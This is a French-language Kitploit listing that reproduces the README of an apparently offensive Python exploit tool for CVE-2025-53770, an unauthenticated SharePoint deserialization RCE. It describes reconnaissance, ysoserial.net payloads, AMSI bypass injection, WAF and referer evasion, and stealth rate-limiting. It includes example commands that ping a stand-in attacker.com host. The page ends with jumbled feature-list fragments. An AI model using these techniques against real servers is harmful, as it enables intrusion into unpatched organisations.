Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-53770 — Un outil d'exploitation Python sophistiqué et piloté par assistant ciblant CVE-2025-53770, une vulnérabilité critique (CVSS 9.8) d'exécution de code à distance (RCE) non authentifiée dans Microsoft SharePoint Server sur site (2016, 2019, Édition Abonnement) | Kitploit
Outils/GitHubGitHub/exfil0/cve-2025-53770
Escalade de PrivilègesReconnaissanceGénération de PayloadsAnalyse des VulnérabilitésExploitationÉvasion IDS/IPSExploitation d'Applications WebPost-ExploitationTests d'IntrusionCommandement et Contrôle
GitHubexfil0/cve-2025-53770
51il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

CVE-2025-53770

Un outil d'exploitation Python sophistiqué et piloté par assistant ciblant CVE-2025-53770, une vulnérabilité critique (CVSS 9.8) d'exécution de code à distance (RCE) non authentifiée dans Microsoft SharePoint Server sur site (2016, 2019, Édition Abonnement)

Voir le dépôt
Partager

Divine Absolute - Outil d'exploitation CVE-2025-53770

License
Python

Aperçu

Divine Absolute est un outil d'exploitation Python sophistiqué et piloté par assistant, ciblant CVE-2025-53770, une vulnérabilité critique (CVSS 9,8) d'exécution de code à distance (RCE) non authentifiée dans Microsoft SharePoint Server sur site (2016, 2019, Subscription Edition). Cette vulnérabilité, divulguée en tant que zero-day le 19 juillet 2025, découle de la désérialisation de données non fiables dans /_layouts/15/ToolPane.aspx. L'outil est conçu uniquement pour les tests d'intrusion éthiques et la recherche en sécurité autorisée, offrant une précision, une furtivité et une adaptabilité inégalées pour la reconnaissance, l'exploitation et la vérification.

Dépôt : https://github.com/exfil0/CVE-2025-53770

⚠️ Avertissement légal : Cet outil est destiné à un usage licite et autorisé uniquement, dans des environnements contrôlés et avec une permission explicite. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas la permission de tester est illégale et peut entraîner de graves conséquences juridiques. L'auteur décline toute responsabilité en cas de mauvaise utilisation.

Fonctionnalités

  • Modes :
    • Recon : détecte la présence de SharePoint, sa version et l'accessibilité de ToolPane.aspx avec un scoring avancé et des regex (par ex., 16.0.0.\d+-\w+?).
    • Exploit : envoie des charges utiles via ToolPane.aspx avec des contournements robustes.
    • Full : combine reconnaissance et exploitation, avec une exploitation agressive facultative.
  • Génération de charges utiles :
    • Intègre ysoserial.net pour les charges utiles de désérialisation .NET (par ex., ObjectDataProvider, LosFormatter).
    • pythonnet facultatif pour les charges utiles de repli HTTP/DNS pingback (par ex., WebRequest.Create, Dns.GetHostEntry).
    • Prend en charge la compression GZIP avec encodage/décodage explicite et validation base64.
    • Injecte des contournements AMSI (réflexion de base, obfusqués ou extraits personnalisés) dans les commandes PowerShell, y compris les charges utiles encodées en base64 (-enc).
  • Contournements :
    • Évasion URI : suffixes fixes ou aléatoires (par ex., /xp.aspx, basés sur UUID).
    • Spoofing du référent : aucun, domaines externes (par ex., www.google.com), URL personnalisées ou chemins SharePoint internes (par ex., ).

Contexte de CVE-2025-53770

  • Vulnérabilité : RCE non authentifiée via désérialisation dans /_layouts/15/ToolPane.aspx.
  • Affectés : SharePoint Server 2016, 2019, Subscription Edition (les versions EOL 2010/2013 sont également vulnérables).
  • Non affectés : SharePoint Online (M365).
  • Exploitée : depuis le 18 juillet 2025, dans des campagnes telles que « ToolShell » menées par des acteurs parrainés par des États (par ex., Linen Typhoon).
  • Correctifs : Les correctifs Microsoft (par ex., KB5002768, KB5002754) publiés le 19 juillet 2025 atténuent complètement la vulnérabilité. L'inscription au catalogue KEV de la CISA impose un correctif au niveau fédéral d'ici le 21 juillet 2025.
  • Atténuations : Corriger, faire pivoter les clés après le correctif, activer AMSI/Defender (mode complet), surveiller les requêtes POST vers /ToolPane.aspx, utiliser des règles WAF (par ex., Cloudflare).

Installation

Prérequis

  • Python 3.8+
  • Dépendances :
    root@kitploit:~
    pip install requests termcolor
    
  • Facultatif (pour le repli de sérialisation .NET) :
    root@kitploit:~
    pip install pythonnet
    
  • ysoserial.net :
    • Téléchargez-le depuis les versions de ysoserial.net.
    • Placez ysoserial.exe dans un chemin connu (par ex., ./ysoserial.exe).
  • Mono/Wine (systèmes non Windows) :
    root@kitploit:~
    # Ubuntu/Debian
    sudo apt-get install mono-complete
    # macOS (via Homebrew)
    brew install mono
    
  • Laboratoire Docker (recommandé pour les tests) :
    root@kitploit:~
    docker pull mcr.microsoft.com/sharepoint/server:2019
    

Configuration

  1. Clonez le dépôt :
    root@kitploit:~
    git clone https://github.com/exfil0/CVE-2025-53770.git
    cd CVE-2025-53770
    
  2. Installez les dépendances Python :
    root@kitploit:~
    pip install -r requirements.txt
    
  3. Assurez-vous que ysoserial.exe est accessible ou fournissez son chemin lors de l'exécution.
  4. (Facultatif) Vérifiez Mono/Wine pour les systèmes non Windows.

Utilisation

Lancez l'assistant interactif :

root@kitploit:~
python divine_absolute.py

Flux de travail

  1. Sélection du mode :
    • Recon : recherche la présence et la version de SharePoint.
    • Exploit : envoie la charge utile à ToolPane.aspx.
    • Full : recon + exploit (mode agressif facultatif).
  2. Saisie de la cible :
    • URL unique (par ex., https://sharepoint.example.com).
    • Fichier contenant des URL (une par ligne).
  3. Configuration de la charge utile :
    • ysoserial.net : spécifiez le chemin, le gadget (par ex., ObjectDataProvider) et la commande (par ex., cmd /c whoami).
    • File : chargez une charge utile GZIP base64 depuis un fichier.
    • String : saisissez directement une charge utile GZIP base64.
    • Pingback : générez un pingback HTTP/DNS (par ex., http://attacker.com/callback ou sub.attacker.com).
    • Contournement AMSI : choisissez NONE, , ou un extrait personnalisé.

Exemples de commandes

  • Reconnaissance :
    root@kitploit:~
    python divine_absolute.py
    # Select: Mode=Recon, Target=https://sharepoint.example.com
    
  • Exploitation avec ysoserial.net :
    root@kitploit:~
    python divine_absolute.py
    # Select: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
    #         ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
    #         Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
    
  • Mode Full avec vérification :
    root@kitploit:~
    python divine_absolute.py
    # Select: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
    #         Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
    
  • Pingback DNS :
    root@kitploit:~
    python divine_absolute.py
    # Select: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
    

Sortie

Les résultats sont enregistrés dans xanthorox_results.json avec les champs suivants :

  • target : URL testée.
  • sharepoint_detected : booléen.
  • toolpane_accessible : booléen.
  • exploited : booléen (charge utile envoyée).
  • verified_rce : booléen/null (RCE confirmée).
  • error : toutes les erreurs rencontrées.

Exemple :

root@kitploit:~
[
  {
    "target": "https://sharepoint.example.com",
    "sharepoint_detected": true,
    "toolpane_accessible": true,
    "exploited": true,
    "verified_rce": true,
    "error": null
  }
]

Améliorations apportées

Cette version corrige :

  • Limitation de débit adaptative : ignore les erreurs non réessayables (par ex., 404) pour les compteurs de succès/erreurs ; applique un plancher de RPS (0,01).
  • Injection AMSI : décode et injecte des contournements dans les commandes PowerShell encodées en base64 (-enc) ; prend en charge les commandes non PowerShell (par ex., cmd.exe) avec des avertissements.
  • Repli Pingback : utilise pythonnet pour un pingback DNS fiable avec Dns.GetHostEntry (expérimental, nécessite un gadget pour un effet complet).

Recommandations de test

  • Configuration en laboratoire : utilisez un conteneur Docker SharePoint Server 2019 (non corrigé) pour des tests sûrs.
  • Test WAF : validez les contournements contre Cloudflare ou des WAF similaires avec un RPS adaptatif.
  • Test des charges utiles : générez des charges utiles avec ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 et vérifiez les journaux DNS.

Limitations connues

  • Fiabilité du pingback : Dns.GetHostEntry dans pythonnet peut ne pas se déclencher sans une chaîne de gadgets spécifique.
  • Commandes complexes : les commandes PowerShell non standard peuvent nécessiter une injection manuelle de contournement AMSI.
  • Détection par WAF : certains WAF peuvent bloquer les charges utiles malgré les contournements ; testez en profondeur.

Contribution

Les contributions sont les bienvenues ! Veuillez :

  1. Forkez le dépôt.
  2. Créez une branche de fonctionnalité (git checkout -b feature/awesome-improvement).
  3. Commitez les modifications (git commit -m "Add awesome improvement").
  4. Poussez vers la branche (git push origin feature/awesome-improvement).
  5. Ouvrez une pull request.

Licence

Ce projet est sous licence MIT. Voir LICENSE pour plus de détails.

Remerciements

  • xAI : pour avoir inspiré une recherche en sécurité de pointe.
  • Équipe ysoserial.net : pour le générateur de charges utiles de désérialisation .NET.
  • Communauté de la sécurité : pour ses analyses de l'exploitation et des atténuations de CVE-2025-53770.

Contact

  • Auteur : @exfil0
  • Problèmes : Problèmes GitHub
  • Telegram : https://t.me/GOTOCVE

Note : Vérifiez toujours les charges utiles et les configurations dans un laboratoire contrôlé avant utilisation. Restez éthique, restez légal.

Télécharger l’outil
/_layouts/15/sharepoint.aspx
  • Furtivité :
    • Limitation de débit adaptative avec un plancher de RPS minimal (0,01) et un contrôle des rafales.
    • Concurrence thread-safe avec rythme et gigue protégés par verrou (0 à 0,1 s).
  • Vérification :
    • Confirmation RCE robuste avec des regex OR compilées, nouvelles tentatives en cas de RequestException, et codes de statut/chemins personnalisables.
  • Reconnaissance :
    • Détection SharePoint améliorée via les en-têtes (par ex., MicrosoftSharePointTeamServices), les chemins (par ex., /versions.aspx) et les regex.
  • Sortie :
    • Résultats JSON avec journalisation forensique pour l'analyse.
  • Ergonomie :
    • Assistant interactif pour une configuration facile.
    • Prend en charge Mono/Wine pour ysoserial.net sur les systèmes non Windows.
    • Prise en charge des proxys (HTTP/SOCKS5) et délais d'expiration personnalisables.
  • BASIC_REFLECTION
    CONCAT_OBFUSCATED
  • Options de contournement :
    • URI : NONE, FIXED (par ex., /xp.aspx), RANDOM (basé sur UUID).
    • Référent : DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL.
  • Paramètres réseau :
    • Proxy (par ex., http://127.0.0.1:8080).
    • Threads, délai d'expiration, gigue et limite de débit (RPS).
  • Vérification RCE :
    • Spécifiez le chemin (par ex., /sitepages/result.txt), les regex (par ex., Xanthorox.*), les codes de statut (par ex., 200,403), les tentatives, le délai et le délai d'expiration.